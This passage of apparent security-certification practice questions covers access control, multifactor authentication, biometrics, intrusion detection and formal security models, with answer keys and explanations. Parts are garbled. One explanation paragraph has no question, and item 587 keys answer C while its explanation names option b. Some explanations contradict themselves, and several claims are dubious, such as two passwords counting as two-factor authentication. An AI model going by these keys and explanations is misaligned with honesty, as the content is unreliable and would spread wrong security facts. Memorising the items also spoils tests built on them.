D. When the enforcement of normal security policies, procedures, and rules is difficult, it takes on a different dimension from that of requiring contracts, separation of duties, and system access controls. Under these situations, compensating controls in the form of close supervision, followed by peer and team review of the quality of work, are needed.
101. a. An information system authenticates devices before establishing remote and wireless network connections using bidirectional authentication between devices that is cryptographically based. Examples of device identifiers include media access control (MAC) addresses, IP addresses, e-mail IDs, and device unique token identifiers. Examples of device authenticators include digital/PKI certificates and passwords. The other three choices are not correct because they lack two-way authentication.
531
Which of the following is critical to understanding an access control policy? a. Reachable-state b. Protection-state c. User-state d. System-state
B. A protection-state is that part of the system-state critical to understanding an access control policy. A system must be either in a protection-state or reachable-state. User-state is not critical because it is the least privileged mode.
532
Which of the following should not be used in Kerberos authentication implementation? a. Data encryption standard (DES) b. Advanced encryption standard (AES) c. Rivest, Shamir, and Adelman (RSA) d. Diffie-Hellman (DH)
A. DES is weak and should not be used because of several documented security weaknesses. The other three choices can be used. AES can be used because it is strong. RSA is used in key transport where the authentication server generates the user symmetric key and sends the key to the client. DH is used in key agreement between the authentication server and the client.
533
From an access control decision viewpoint, failures due to flaws in permission-based systems tend to do which of the following? a. Authorize permissible actions b. Fail-safe with permission denied c. Unauthorize prohibited actions d. Grant unauthorized permissions
B. When failures occur due to flaws in permission-based systems, they tend to fail-safe with permission denied. There are two types of access control decisions: permission-based and exclusion-based.
534
Host and application system hardening procedures are a part of which of the following? a. Directive controls b. Preventive controls c. Detective controls d. Corrective controls
B. Host and application system hardening procedures are a part of preventive controls, as they include antivirus software, firewalls, and user account management. Preventive controls deter security incidents from happening in the first place. Directive controls are broad-based controls to handle security incidents, and they include management’s policies, procedures, and directives. Detective controls enhance security by monitoring the effectiveness of preventive controls and by detecting security incidents where preventive controls were circumvented. Corrective controls are procedures to react to security incidents and to take remedial actions on a timely basis. Corrective controls require proper planning and preparation as they rely more on human judgment.
535
From an access control decision viewpoint, fail-safe defaults operate on which of the following? 1. Exclude and deny 2. Permit and allow 3. No access, yes default 4. Yes access, yes default a. 1 only b. 2 only c. 2 and 3 d. 4 only
C. Fail-safe defaults mean that access control decisions should be based on permit and allow policy (i.e., permission rather than exclusion). This equates to the condition in which lack of access is the default (i.e., no access, yes default). “Allow all and deny-by-default” refers to yes-access, yes-default situations.
536
For password management, automatically generated random passwords usually provide which of the following? 1. Greater entropy 2. Passwords that are hard for attackers to guess 3. Stronger passwords 4. Passwords that are hard for users to remember a. 2 only b. 2 and 3 c. 2, 3, and 4 d. 1, 2, 3, and 4
D. Automatically generated random (or pseudo-random) passwords usually provide greater entropy, are hard for attackers to guess or crack, and are stronger passwords, but at the same time they are hard for users to remember.
537
In biometrics-based identification and authentication techniques, which of the following indicates that security is unacceptably weak? a. Low false acceptance rate b. Low false rejection rate c. High false acceptance rate d. High false rejection rate
C. The trick is balancing the trade-off between the false acceptance rate (FAR) and false rejection rate (FRR). A high FAR means that security is unacceptably weak. A FAR is the probability that a biometric system can incorrectly identify an individual or fail to reject an imposter. The FAR given normally assumes passive imposter attempts, and a low FAR is better. The FAR is stated as the ratio of the number of false acceptances divided by the number of identification attempts. An FRR is the probability that a biometric system will fail to identify an individual or verify the legitimate claimed identity of an individual. A low FRR is better. The FRR is stated as the ratio of the number of false rejections divided by the number of identification attempts.
538
In biometrics-based identification and authentication techniques, which of the following indicates that technology used in a biometric system is not viable? a. Low false acceptance rate b. Low false rejection rate c. High false acceptance rate d. High false rejection rate
D. A high false rejection rate (FRR) means that the technology is creating a nuisance for falsely rejected users, thereby undermining user acceptance and calling into question the viability of the technology used. This could also mean that the technology is obsolete, inappropriate, and/or not meeting the user’s changing needs. A false acceptance rate (FAR) is the probability that a biometric system will incorrectly identify an individual or fail to reject an imposter. The FAR given normally assumes passive imposter attempts; a low FAR is better, and a high FAR is an indication of a poorly operating biometric system, not related to technology. The FAR is stated as the ratio of the number of false acceptances divided by the number of identification attempts. An FRR is the probability that a biometric system will fail to identify an individual or verify the legitimate claimed identity of an individual. A low FRR is better. The FRR is stated as the ratio of the number of false rejections divided by the number of identification attempts.
539
In biometrics-based identification and authentication techniques, what is a countermeasure to mitigate the threat of identity spoofing? a. Liveness detection b. Digital signatures c. Rejecting exact matches d. Session lock
A. An adversary may present something other than his own biometric to trick the system into verifying someone else’s identity, known as spoofing. One type of mitigation for an identity spoofing threat is liveness detection (e.g., pulse or lip reading). The other three choices cannot perform liveness detection.
540
In biometrics-based identification and authentication techniques, what is a countermeasure to mitigate the threat of impersonation? a. Liveness detection b. Digital signatures c. Rejecting exact matches d. Session lock
B. Attackers can use residual data on the biometric reader or in memory to impersonate someone who authenticated previously. Cryptographic methods such as digital signatures can prevent attackers from inserting or swapping biometric data without detection. The other three choices do not provide cryptographic measures to prevent impersonation attacks.
541
In biometrics-based identification and authentication techniques, what is a countermeasure to mitigate the threat of replay attack? a. Liveness detection b. Digital signatures c. Rejecting exact matches d. Session lock
C. A replay attack occurs when someone can capture a valid user’s biometric data and use it at a later time for unauthorized access. A potential solution is to reject exact matches, thereby requiring the user to provide another biometric sample. The other three choices do not reject exact matches.
542
In biometrics-based identification and authentication techniques, what is a countermeasure to mitigate the threat of a security breach from unsuccessful authentication attempts? a. Liveness detection b. Digital signatures c. Rejecting exact matches d. Session lock
D. It is good to limit the number of times any user can unsuccessfully attempt to authenticate. A session lock should be in place so that the system locks the user out and logs a security event whenever a user exceeds a certain number of failed logon attempts within a specified timeframe. The other three choices cannot stop unsuccessful authentication attempts. For example, if an adversary can repeatedly submit fake biometric data hoping for an exact match, it creates a security breach without a session lock. In addition, rejecting exact matches creates ill will with the genuine user.
543
In the single sign-on technology, timestamps thwart which of the following? a. Man-in-the-middle attack b. Replay attack c. Social engineering attack d. Phishing attack
B. Timestamps or other mechanisms to thwart replay attacks should be included in the single sign-on (SSO) credential transmissions. Man-in-the-middle (MitM) attacks are based on authentication and social engineering, and phishing attacks are based on passwords.
544
From an access control effectiveness viewpoint, which of the following represents biometric verification when a user submits a combination of a personal identification number (PIN) first and biometric sample next for authentication? a. One-to-one matching b. One-to-many matching c. Many-to-one matching d. Many-to-many matching
A. This combination of authentication represents something that you know (PIN) and something that you are (biometric). At the authentication system prompt, the user enters the PIN and then submits a biometric live-captured sample. The system compares the biometric sample to the biometric reference data associated with the PIN entered, which is a one-to-one matching of biometric verification. The other three choices are incorrect because the correct answer is based on its definition.
545
From an access control effectiveness viewpoint, which of the following represents biometric identification when a user submits a combination of a biometric sample first and a personal identification number (PIN) next for authentication? a. One-to-one matching b. One-to-many matching c. Many-to-one matching d. Many-to-many matching
B. This combination of authentication represents something that you know (PIN) and something that you are (biometric). The user presents a biometric sample first to the sensor, and the system conducts a one-to-many matching of biometric identification. The user is then prompted to supply a PIN that corresponds to the biometric reference data. The other three choices are incorrect because the correct answer is based on its definition.
546
During biometric identification, which of the following can result in slow system response times and increased expense? a. One-to-one matching b. One-to-many matching c. Many-to-one matching d. Many-to-many matching
B. The biometric identification with one-to-many matching can result in slow system response times and can be more expensive depending on the size of the biometric database. That is, the larger the database size, the slower the system response time. A personal identification number (PIN) is entered as a second authentication factor, and the matching is slow.
547
During biometric verification, which of the following can result in faster system response times and can be less expensive? a. One-to-one matching b. One-to-many matching c. Many-to-one matching d. Many-to-many matching
A. The biometric verification with one-to-one matching can result in faster system response times and can be less expensive because the personal identification number (PIN) is entered as a first authenticator and the matching is quick.
548
From an access control effectiveness viewpoint, which of the following is represented when a user submits a combination of hardware token and a personal identification number (PIN) for authentication? 1. A weak form of two-factor authentication 2. A strong form of two-factor authentication 3. Supports physical access 4. Supports logical access a. 1 only b. 2 only c. 1 and 3 d. 2 and 4
C. This combination represents something that you have (i.e., hardware token) and something that you know (i.e., PIN). The hardware token can be lost or stolen. Therefore, this is a weak form of two-factor authentication that can be used to support unattended access controls for physical access only. Logical access controls are software based and as such do not support a hardware token.
549
From an access control effectiveness viewpoint, which of the following is represented when a user submits a combination of public key infrastructure (PKI) keys and a personal identification number (PIN) for authentication? 1. A weak form of two-factor authentication 2. A strong form of two-factor authentication 3. Supports physical access 4. Supports logical access a. 1 only b. 2 only c. 1 and 3 d. 2 and 4
D. This combination represents something that you have (i.e., PKI keys) and something that you know (i.e., PIN). There is no hardware token to lose or steal. Therefore, this is a strong form of two-factor authentication that can be used to support logical access.
550
RuBAC is rule-based access control, ACL is access control list, IBAC is identity-based access control, DAC is discretionary access control, and MAC is mandatory access control. For identity management, which of the following equates the access control policies and decisions between the U.S. terminology and the international standards? 1. RuBAC = ACL 2. IBAC = ACL 3. IBAC = DAC 4. RuBAC = MAC a. 1 only b. 2 only c. 3 only d. 3 and 4
D. Identity-based access control (IBAC) and discretionary access control (DAC) are considered equivalent. The rule-based access control (RuBAC) and mandatory access control (MAC) are considered equivalent. IBAC uses access control lists (ACLs) whereas RuBAC does not.
551
For identity management, most network operating systems are based on which of the following access control policies? a. Rule-based access control (RuBAC) b. Identity-based access control (IBAC) c. Role-based access control (RBAC) d. Attribute-based access control (ABAC)
B. Most network operating systems are implemented with an identity-based access control (IBAC) policy. Entities are granted access to resources based on any identity established during network logon, which is compared with one or more access control lists (ACLs). These lists may be individually administered, may be centrally administered and distributed to individual locations, or may reside on one or more central servers. Attribute-based access control (ABAC) deals with subjects and objects, rule-based (RuBAC) deals with rules, and role-based (RBAC) deals with roles or job functions.
552
RBAC is role-based access control, MAC is mandatory access control, DAC is discretionary access control, ABAC is attribute-based access control, PBAC is policy-based access control, IBAC is identity-based access control, RuBAC is rule-based access control, RAdAC is risk-adaptive access control, and UDAC is user-directed access control. For identity management, RBAC policy is defined as which of the following? a. RBAC = MAC + DAC b. RBAC = ABAC + PBAC c. RBAC = IBAC + RuBAC d. RBAC = RAdAC + UDAC
C. Role-based access control policy (RBAC) is a composite access control policy between identity-based access control (IBAC) policy and rule-based access control (RuBAC) policy and should be considered as a variant of both. In this case, an identity is assigned to a group that has been granted authorizations. Identities can be members of one or more groups.
553
A combination of something you have (one time), something you have (second time), and something you know is used to represent which of the following personal authentication proofing schemes? a. One-factor authentication b. Two-factor authentication c. Three-factor authentication d. Four-factor authentication
B. This situation illustrates that multiple instances of the same factor (i.e., something you have is used two times) results in one-factor authentication. When this is combined with something you know, it results in a two-factor authentication scheme.
554
Remote access controls are a part of which of the following? a. Directive controls b. Preventive controls c. Detective controls d. Corrective controls
B. Remote access controls are a part of preventive controls, as they include Internet Protocol (IP) packet filtering by border routers and firewalls using access control lists. Preventive controls deter security incidents from happening in the first place. Directive controls are broad-based controls to handle security incidents, and they include management’s policies, procedures, and directives. Detective controls enhance security by monitoring the effectiveness of preventive controls and by detecting security incidents where preventive controls were circumvented. Corrective controls are procedures to react to security incidents and to take remedial actions on a timely basis. Corrective controls require proper planning and preparation as they rely more on human judgment.
555
What is using two different passwords for accessing two different systems in the same session called? a. One-factor authentication b. Two-factor authentication c. Three-factor authentication d. Four-factor authentication
B. Requiring two different passwords for accessing two different systems in the same session is more secure than requiring one password for two different systems. This equates to two-factor authentication. Requiring multiple proofs of authentication presents multiple barriers to entry access by intruders. On the other hand, using the same password (one-factor) for accessing multiple systems in the same session is a one-factor authentication, because only one type (and the same type) of proof is used. The key point is whether the type of proof presented is same or different.
556
What is using a personal identity card with attended access (e.g., a security guard) and a PIN called? a. One-factor authentication b. Two-factor authentication c. Three-factor authentication d. Four-factor authentication
B. On the surface, this situation may seem to be three-factor authentication, but in reality it is two-factor authentication, because only a card (proof of one factor) and a PIN (proof of a second factor) are used. Note that it is not the strongest two-factor authentication because of the attended access. A security guard, who checks the validity of the card, is an example of attended access and is counted as one-factor authentication. Other examples of attended access include peers, colleagues, and supervisors who will vouch for the identity of a visitor who is accessing physical facilities.
557
A truck driver, who is an employee of a defense contractor, transports highly sensitive parts and components from a defense contractor’s manufacturing plant to a military installation at a highly secure location. The military’s receiving department tracks the driver’s physical location to ensure that there are no security problems on the way to the installation. Upon arrival at the installation, the truck driver shows his employee badge with photo ID issued by the defense contractor, enters his password and PIN, and provides a biometric sample of his fingerprint prior to entering the installation and unloading the truck’s contents. What does this scenario represent? a. One-factor authentication b. Two-factor authentication c. Three-factor authentication d. Four-factor authentication
D. Tracking the driver’s physical location (perhaps with GPS or a wireless sensor network) is an example of somewhere you are (proof of first factor). Showing a physical employee badge with photo ID is an example of something you have (proof of second factor). Entering a password and PIN is an example of something you know (proof of third factor). Providing a biometric sample of a fingerprint is an example of something you are (proof of fourth factor). Therefore, this scenario represents four-factor authentication. The key point is that it does not matter whether the proof presented is one item or more items in the same category (e.g., somewhere you are, something you have, something you know, and something you are).
558
Which of the following is achieved when two authentication proofs of something that you have is implemented? a. Least assurance b. Increased assurance c. Maximum assurance d. Equivalent assurance
A. Least assurance is achieved when two authentication proofs of something that you have (e.g., card, key, and mobile ID device) are implemented because the card and the key can be lost or stolen. Consequently, multiple uses of something that you have offer lesser access control assurance than using a combination of multifactor authentication techniques. Equivalent assurance is neutral and does not require any further action.
559
Which of the following is achieved when two authentication proofs of something that you know are implemented? a. Least assurance b. Increased assurance c. Maximum assurance d. Equivalent assurance
B. Increased assurance is achieved when two authentication proofs of something that you know (e.g., using two different passwords with or without PINs) are implemented. Multiple proofs of something that you know offer greater assurance than does multiple proofs of something that you have. However, multiple uses of something that you know provide equivalent assurance to a combination of multifactor authentication techniques.
560
Which of the following is achieved when “two authentication proofs of something that you are” is implemented? a. Least assurance b. Increased assurance c. Maximum assurance d. Equivalent assurance
C. Maximum assurance is achieved when two authentication proofs of something that you are (e.g., personal recognition by a colleague, user, or guard, and a biometric verification check) are implemented. Multiple proofs of something that you are offer greater assurance than do multiple proofs of something that you have or something that you know, used either alone or combined. Equivalent assurance is neutral and does not require any further action.
561
For key functions of intrusion detection and prevention system (IDPS) technologies, which of the following is referred to when an IDPS configuration is altered? a. Tuning b. Evasion c. Blocking d. Normalization
A. Altering the configuration of an intrusion detection and prevention system (IDPS) to improve its detection accuracy is known as tuning. IDPS technologies cannot provide completely accurate detection at all times. Blocking means that access to the targeted host is blocked from the offending user account or IP address. Evasion is modifying the format or timing of malicious activity so that its appearance changes but its effect is the same. Attackers use evasion techniques to try to prevent IDPS technologies from detecting their attacks. Most IDPS technologies can overcome common evasion techniques by duplicating special processing performed by the targeted host. If the IDPS configuration is the same as the targeted host’s, then evasion techniques will be unsuccessful at hiding attacks. Some intrusion prevention system (IPS) technologies can remove or replace malicious portions of an attack to make it benign. A complex example is an IPS that acts as a proxy and normalizes incoming requests, which means that the proxy repackages the payloads of the requests, discarding header information. This might cause certain attacks to be discarded as part of the normalization process.
562
A reuse of a user’s operating system password for preboot authentication should not be practiced in the deployment of which of the following storage encryption authentication products? a. Full-disk encryption b. Volume encryption c. Virtual disk encryption d. File/folder encryption
A. Reusing a user’s operating system password for preboot authentication in a full (whole) disk encryption deployment would allow an attacker to learn only a single password to gain full access to the device’s information. The password could be acquired through technical methods, such as infecting the device with malware, or through physical means, such as watching a user type in a password in a public location. The correct choice is risky compared to the incorrect choices because the latter do not deal with booting a computer or preboot authentication.
563
All the following storage encryption authentication products may use the operating system’s authentication for single sign-on except: a. Full-disk encryption b. Volume encryption c. Virtual disk encryption d. File/folder encryption
A. Products such as volume encryption, virtual disk encryption, or file/folder encryption may use the operating system’s authentication for single sign-on (SSO). After a user authenticates to the operating system at login time, the user can access the encrypted file without further authentication, which is risky. You should not use the same single-factor authenticator for multiple purposes. A full-disk encryption provides better security than the other three choices because the entire disk is encrypted, as opposed to part of it.
564
Which of the following security mechanisms for high-risk storage encryption authentication products provides protection against authentication-guessing attempts and favors security over functionality? a. Alert consecutive failed login attempts. b. Lock the computer for a specified period of time. c. Increase the delay between attempts. d. Delete the protected data from the device.
D. For high-security situations, storage encryption authentication products can be configured so that too many failed attempts cause the product to delete all the protected data from the device. This approach strongly favors security over functionality. The other three choices can be used for low-security situations.
565
Recovery mechanisms for storage encryption authentication solutions require which of the following? a. A trade-off between confidentiality and security b. A trade-off between integrity and security c. A trade-off between availability and security d. A trade-off between accountability and security
C. Recovery mechanisms increase the availability of the storage encryption authentication solutions for individual users, but they can also increase the likelihood that an attacker can gain unauthorized access to encrypted storage by abusing the recovery mechanism. Therefore, information security management should consider the trade-off between availability and security when selecting and planning recovery mechanisms. The other three choices do not provide recovery mechanisms.
566
For password management, which of the following ensures password strength? a. Passwords with maximum keyspace, shorter passphrases, low entropy, and simple passphrases b. Passwords with balanced keyspace, longer passphrases, high entropy, and complex passphrases c. Passwords with minimum keyspace, shorter passphrases, high entropy, and simple passphrases d. Passwords with most likely keyspace, longer passphrases, low entropy, and complex passphrases
B. Password strength is determined by a password’s length and its complexity, which is determined by the unpredictability of its characters. Passwords based on patterns such as keyspace may meet password complexity and length requirements, but they significantly reduce the keyspace because attackers are aware of these patterns. The ideal keyspace is a balanced one between maximum, most likely, and minimum scenarios. Simple and short passphrases have low entropy because they consist of concatenated dictionary words, which are easy to guess and attack. Therefore, passphrases should be complex and longer to provide high entropy. Passwords with balanced keyspace, longer passphrases, high entropy, and complex passphrases ensure password strength.
A. When a user logs onto a host computer or workstation, the user must be identified and authenticated before access to the host or network is granted. This process requires a mechanism to authenticate a real person to a machine. The best methods of doing this involve multiple forms of authentication with multiple factors, such as something you know (password), something you have (physical token), and something you are (biometric verification). The other three choices do not require multifactor authentication because they use different authentication methods. Peer-to-peer architecture, sometimes referred to as mutual authentication protocol, involves the direct communication of authentication information between the communicating entities (e.g., peer-to-peer or client host-to-server). The architecture for trusted third-party (TTP) authentication uses a third entity, trusted by all entities, to provide authentication information. The amount of trust given the third entity must be evaluated. Methods to establish and maintain a level of trust in a TTP include certification practice statements (CPS) that establish rules, processes, and procedures that a certificate authority (CA) uses to ensure the integrity of the authentication process, and use of secure protocols to interface with authentication servers. A TTP may provide authentication information in each instance of authentication, in real time, or as a precursor to an exchange with a CA.
567
Regarding password management, which of the following enforces password strength requirements effectively? a. Educate users on password strength. b. Run a password cracker program to identify weak passwords. c. Perform a cracking operation offline. d. Use a password filter utility program.
D. One way to ensure password strength is to add a password filter utility program, which is specifically designed to verify that a password created by a user complies with the password policy. Adding a password filter is a more rigorous and proactive solution, whereas the other three choices are less rigorous and reactive solutions. The password filter utility program is also referred to as a password complexity enforcement program.
568
Which of the following controls over telecommuting use tokens and/or one-time passwords? a. Firewalls b. Robust authentication c. Port protection devices d. Encryption
B. Robust authentication increases security in two significant ways. It can require the user to possess a token in addition to a password or personal identification number (PIN). Tokens, when used with PINs, provide significantly more security than passwords. For a hacker or other would-be impersonator to pretend to be someone else, the impersonator must have both a valid token and the corresponding PIN. This is much more difficult than obtaining a valid password and user ID combination. Robust authentication can also create one-time passwords. Electronic monitoring (eavesdropping or sniffing) or observing a user type in a password is not a threat with one-time passwords because each time a user is authenticated to the computer, a different “password” is used. (A hacker could learn the one-time password through electronic monitoring, but it would be of no value.) The firewall is incorrect because it uses a secure gateway or series of gateways to block or filter access between two networks, often between a private network and a larger, more public network such as the Internet or a public-switched network (e.g., the telephone system). A firewall does not use tokens and passwords as much as robust authentication. A port protection device (PPD) is incorrect because it is fitted to a communications port of a host computer and authorizes access to the port itself, prior to and independent of the computer’s own access control functions. A PPD can be a separate device in the communications stream or may be incorporated into a communications device (e.g., a modem). PPDs typically require a separate authenticator, such as a password, to access the communications port. One of the most common PPDs is the dial-back modem. A PPD does not use tokens and passwords as much as robust authentication. Encryption is incorrect because it is more expensive than robust authentication. It is most useful if highly confidential data needs to be transmitted or if moderately confidential data is transmitted in a high-threat area. Encryption is most widely used to protect the confidentiality of data and its integrity (it detects changes to files). Encryption does not use tokens and passwords as much as robust authentication.
569
Which of the following statements about an access control system is not true? a. It is typically enforced by a specific application. b. It indicates what a specific user could have done. c. It records failed attempts to perform sensitive actions. d. It records failed attempts to access restricted data.
A. Some applications use access control (typically enforced by the operating system) to restrict access to certain types of information or application functions. This can be helpful to determine what a particular application user could have done. Some applications record information related to access control, such as failed attempts to perform sensitive actions or access restricted data.
570
Which of the following is not a preventive measure against network intrusion attacks? a. Firewalls b. Auditing c. System configuration d. Intrusion detection system
B. Auditing is a detection activity, not a preventive measure. Examples of preventive measures to mitigate the risks of network intrusion attacks include firewalls, system configuration, and intrusion detection system.
571
Smart card authentication is an example of which of the following? a. Proof-by-knowledge b. Proof-by-property c. Proof-by-possession d. Proof-of-concept
C. Smart cards are credit card-size plastic cards that host an embedded computer chip containing an operating system, programs, and data. Smart card authentication is perhaps the best-known example of proof-by-possession (e.g., key, card, or token). Passwords are an example of proof-by-knowledge. Fingerprints are an example of proof-by-property. Proof-of-concept deals with testing a product prior to building an actual product.
572
For token threats in electronic authentication, countermeasures used for which one of the following threats are different from the other three threats? a. Online guessing b. Eavesdropping c. Phishing and pharming d. Social engineering
A. In electronic authentication, a countermeasure against the token threat of online guessing uses tokens that generate high entropy authenticators. Common countermeasures against the threats listed in the other three choices are the same and they do not use high entropy authenticators. These common countermeasures include (i) use of tokens with dynamic authenticators where knowledge of one authenticator does not assist in deriving a subsequent authenticator and (ii) use of tokens that generate authenticators based on a token input value.
573
Which of the following is a component that provides a security service for a smart card application used in a mobile device authentication? a. Challenge-response protocol b. Service provider c. Resource manager d. Driver for the smart card reader
A. The underlying mechanism used to authenticate users via smart cards relies on a challenge-response protocol between the device and the smart card. For example, a personal digital assistant (PDA) challenges the smart card for an appropriate and correct response that can be used to verify that the card is the one originally enrolled by the PDA device owner. The challenge-response protocol provides a security service. The three main software components that support a smart card application include the service provider, a resource manager, and a driver for the smart card reader.
574
Which of the following is not a sophisticated technical attack against smart cards? a. Reverse engineering b. Fault injection c. Signal leakage d. Impersonating
D. For user authentication, the fundamental threat is an attacker impersonating a user and gaining control of the device and its contents. Of the four choices, impersonating is a non-sophisticated technical attack. Smart cards are designed to resist tampering and monitoring of the card, including sophisticated technical attacks that involve reverse engineering, fault injection, and signal leakage.
575
Which of the following is an example of non-polled authentication? a. Smart card b. Password c. Memory token d. Communications signal
B. Non-polled authentication is discrete; after the verdict is determined, it is inviolate until the next authentication attempt. Examples of non-polled authentication include password, fingerprint, and voice verification. Polled authentication is continuous; the presence or absence of some token or signal determines the authentication status. Examples of polled authentication include smart card, memory token, and communications signal, whereby the absence of the device or signal triggers a non-authenticated condition.
576
Which of the following does not complement intrusion detection systems (IDS)? a. Honeypots b. Inference cells c. Padded cells d. Vulnerability assessment tools
B. Honeypot systems, padded cell systems, and vulnerability assessment tools complement IDS to enhance an organization’s ability to detect intrusion. Inference cells do not complement IDS. A honeypot system is a host computer that is designed to collect data on suspicious activity and has no authorized users other than security administrators and attackers. Inference cells lead to an inference attack when a user or intruder is able to deduce privileged information from known information. In padded cell systems, an attacker is seamlessly transferred to a special padded cell host. Vulnerability assessment tools determine when a network or host is vulnerable to known attacks.
577
Sniffing precedes which of the following? a. Phishing and pharming b. Spoofing and hijacking c. Snooping and scanning d. Cracking and scamming
B. Sniffing is observing and monitoring packets passing by in the network traffic using packet sniffers. Sniffing precedes either spoofing or hijacking. Spoofing, in part, is using various techniques to subvert IP-based access control by masquerading as another system using its IP address. Spoofing is an attempt to gain access to a system by posing as an authorized user. Other examples of spoofing include spoofing packets to hide the origin of an attack in a DoS, spoofing e-mail headers to hide spam, and spoofing phone numbers to fool caller ID. Spoofing is synonymous with impersonating, masquerading, or mimicking, and is not synonymous with sniffing. Hijacking is an attack that occurs during an authenticated session with a database or system. Snooping, scanning, and sniffing are all actions searching for required and valuable information. They involve looking around for vulnerabilities and planning to attack. These are preparatory actions prior to launching serious penetration attacks. Phishing is tricking individuals into disclosing sensitive personal information through deceptive computer-based means. Phishing attacks use social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials. It involves Internet fraudsters who send spam or pop-up messages to lure personal information (e.g., credit card numbers, bank account information, social security number, passwords, or other sensitive information) from unsuspecting victims. Pharming is misdirecting users to fraudulent websites or proxy servers, typically through DNS hijacking or poisoning. Cracking is breaking passwords and bypassing software controls in an electronic authentication system such as user registration. Scamming is impersonating a legitimate business using the Internet. The buyer should check out the seller before buying goods or services. The seller should give out a physical address with a working telephone number.
578
Passwords and personal identification numbers (PINs) are examples of which of the following? a. Procedural access controls b. Physical access controls c. Logical access controls d. Administrative access controls
C. Logical, physical, and administrative controls are examples of access control mechanisms. Passwords, PINs, and encryption are examples of logical access controls.
579
Which of the following statements is not true about honeypots’ logs? a. Honeypots are deceptive measures. b. Honeypots collect data on indications. c. Honeypots are hosts that have no authorized users. d. Honeypots are a supplement to properly securing networks, systems, and applications.
B. Honeypots are deceptive measures collecting better data on precursors, not on indications. A precursor is a sign that an incident may occur in the future. An indication is a sign that an incident may have occurred or may be occurring now. Honeypots are hosts that have no authorized users other than the honeypot administrators because they serve no business function; all activity directed at them is considered suspicious. Attackers scan and attack honeypots, giving administrators data on new trends and attack/attacker tools, particularly malicious code. However, honeypots are a supplement to, not a replacement for, properly securing networks, systems, and applications.
580
Each user is granted the lowest clearance needed to perform authorized tasks. Which of the following principles is this? a. The principle of least privilege b. The principle of separation of duties c. The principle of system clearance d. The principle of system accreditation
A. The principle of least privilege requires that each subject (user) in a system be granted the most restrictive set of privileges (or lowest clearances) needed to perform authorized tasks. The application of this principle limits the damage that can result from accident, error, and/or unauthorized use. The principle of separation of duties states that no single person can have complete control over a business transaction or task. The principle of system clearance states that users’ access rights should be based on their job clearance status (i.e., sensitive or nonsensitive). The principle of system accreditation states that all systems should be approved by management prior to making them operational.
581
Which of the following intrusion detection and prevention system (IDPS) methodology is appropriate for analyzing both network-based and host-based activity? a. Signature-based detection b. Misuse detection c. Anomaly-based detection d. Stateful protocol analysis
D. IDPS technologies use many methodologies to detect incidents. The primary classes of detection methodologies include signature-based, anomaly-based, and stateful protocol analysis, where the latter is the only one that analyzes both network-based and host-based activity. Signature-based detection is the process of comparing signatures against observed events to identify possible incidents. A signature is a pattern that corresponds to a known threat. It is sometimes incorrectly referred to as misuse detection or stateful protocol analysis. Misuse detection refers to attacks from within the organization. Anomaly-based detection is the process of comparing definitions of what activity is considered normal against observed events to identify significant deviations and abnormal behavior. Stateful protocol analysis (also known as deep packet inspection) is the process of comparing predetermined profiles of generally accepted definitions of benign protocol activity for each protocol state against observed events to identify deviations. Stateful protocol analysis is appropriate for analyzing both network-based and host-based activity, whereas deep packet inspection is appropriate for network-based activity only. One network-based IDPS can listen on a network segment or switch and can monitor the network traffic affecting multiple hosts that are connected to the network segment. One host-based IDPS operates on information collected from within an individual computer system and determines which processes and user accounts are involved in a particular attack.
582
The Clark-Wilson security model focuses on which of the following? a. Confidentiality b. Integrity c. Availability d. Accountability
B. The Clark-Wilson security model is an approach that provides data integrity for common commercial activities. It is a specific model addressing “integrity,” which is one of five security objectives. The five objectives are: confidentiality, integrity, availability, accountability, and assurance.
583
The Biba security model focuses on which of the following? a. Confidentiality b. Integrity c. Availability d. Accountability
B. The Biba security model is an integrity model in which no subject may depend on a less trusted object, including another subject. It is a specific model addressing only one of the security objectives such as confidentiality, integrity, availability, and accountability.
584
The Take-Grant security model focuses on which of the following? a. Confidentiality b. Accountability c. Availability d. Access rights
D. The Take-Grant security model uses a directed graph to specify the rights that a subject can transfer to an object or that a subject can take from another subject. It does not address the security objectives such as confidentiality, integrity, availability, and accountability. Access rights are a part of access control models.
585
Which of the following is based on precomputed password hashes? a. Brute force attack b. Dictionary attack c. Rainbow attack d. Hybrid attack
C. Rainbow attacks are a form of password cracking technique that employs rainbow tables, which are lookup tables that contain precomputed password hashes. These tables enable an attacker to attempt to crack a password with minimal time on the victim system and without constantly having to regenerate hashes if the attacker attempts to crack multiple accounts. The other three choices are not based on precomputed password hashes, although they are all related to passwords. A brute force attack is a form of guessing attack in which the attacker uses all possible combinations of characters from a given character set and for passwords up to a given length. A dictionary attack is a form of guessing attack in which the attacker attempts to guess a password using a list of possible passwords that is not exhaustive. A hybrid attack is a form of guessing attack in which the attacker uses a dictionary that contains possible passwords and then uses variations through brute force methods of the original passwords in the dictionary to create new potential passwords.
586
For intrusion detection and prevention system capabilities, anomaly-based detection uses which of the following? 1. Blacklists 2. Whitelists 3. Threshold 4. Program code viewing a. 1 and 2 b. 1, 2, and 3 c. 3 only d. 1, 2, 3, and 4
C. Anomaly-based detection is the process of comparing definitions of what activity is considered normal against observed events to identify significant deviations. Thresholds are most often used for anomaly-based detection. A threshold is a value that sets the limit between normal and abnormal behavior. Anomaly-based detection does not use blacklists, whitelists, or program code viewing. A blacklist is a list of discrete entities, such as hosts or applications, that have been previously determined to be associated with malicious activity. A whitelist is a list of discrete entities, such as hosts or applications, known to be benign. Program code viewing and editing features are established to see the detection-related programming code in the intrusion detection and prevention system (IDPS).
587
Which of the following security models addresses the “separation of duties” concept? a. Biba model b. Clark-Wilson model c. Bell-LaPadula model d. Sutherland model
C. The Clark-Wilson security model addresses the separation of duties concept along with well-formed transactions. Separation of duties attempts to ensure the external consistency of data objects. It also addresses the specific integrity goal of preventing authorized users from making improper modifications. The other three models do not address the separation of duties concept.
588
From a computer security viewpoint, the Chinese-Wall policy is related to which of the following? a. Aggregation problem b. Data classification problem c. Access control problem d. Inference problem
C. As presented by Brewer and Nash, the Chinese-Wall policy is a mandatory access control policy for stock market analysts. According to the policy, a market analyst may do business with any company. However, every time the analyst receives sensitive “inside” information from a new company, the policy prevents him from doing business with any other company in the same industry because that would involve him in a conflict of interest situation. In other words, collaboration with one company places the Chinese-Wall between him and all other companies in the same industry. The Chinese-Wall policy does not meet the definition of an aggregation problem; there is no notion of some information being sensitive with the aggregate being more sensitive. The Chinese-Wall policy is an access control policy in which the access control rule is not based just on the sensitivity of the information, but is based on the information already accessed. It is neither an inference nor a data classification problem.
589
Which of the following security models promotes security clearances and sensitivity classifications? a. Biba model b. Clark-Wilson model c. Bell-LaPadula model d. Sutherland model
